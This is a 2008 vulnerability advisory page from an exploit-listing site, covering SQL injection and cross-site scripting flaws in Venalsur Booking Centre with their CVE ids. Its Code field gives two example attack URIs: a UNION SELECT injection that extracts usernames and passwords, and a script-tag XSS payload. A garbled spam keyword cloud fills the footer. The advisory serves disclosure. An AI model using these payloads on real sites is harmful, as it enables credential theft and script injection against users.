about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Venalsur Booking Centre SQL Injection and Cross Site Scripting Vulnerabilities


Title Venalsur Booking Centre SQL Injection and Cross Site Scripting Vulnerabilities
Published 2008-10-29-12:00AM
Updated 2009-03-04-09:36PM
Class Input Validation Error
CVE   CVE-2008-6215 E-2008-6216
Remote  Yes
Local  No
Credit  d3b4g
Vulnerable  Venalsur Booking Centre 0
Not Vulnerable  
Code  An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.The following example URIs are available:http://www.example.com/www_en/cadena_ofertas_ext.php?OfertaID=-1+union+all+select+1,2,3,concat(username,password),5,6,7,8,9,10,11+from+members/*http://www.example.com/www_en/cadena_ofertas_ext.php?OfertaID=<script>alert("XSS")</script>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 16:46:59 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
ms06-078 www.tamlls rubyonrail news for c /search/ex www.wanso. phphtml.ph Lun v fudi luongsonba 197619.b2b PHP Advanc bikniwallp www.yf8888 malayalam POURN SEX wwwx Sexy vadio 200 /compo t969t www.starti local XP mp3 jukeb news for c Crack+Data SEX OCEAN. www.kukugo coppermine Xxxsexmove how to inj localhost 0-day 200+%252Fc index.php% stcp sexe girls 2828com.co Fullysex sexmove mypulau AkoBook2.0 sexmove phorum 5.2 college gi kijiuyhtgr college gi Linux Kern Www.Sexyvi MySQL 4.1. Www.andhra exploit Fr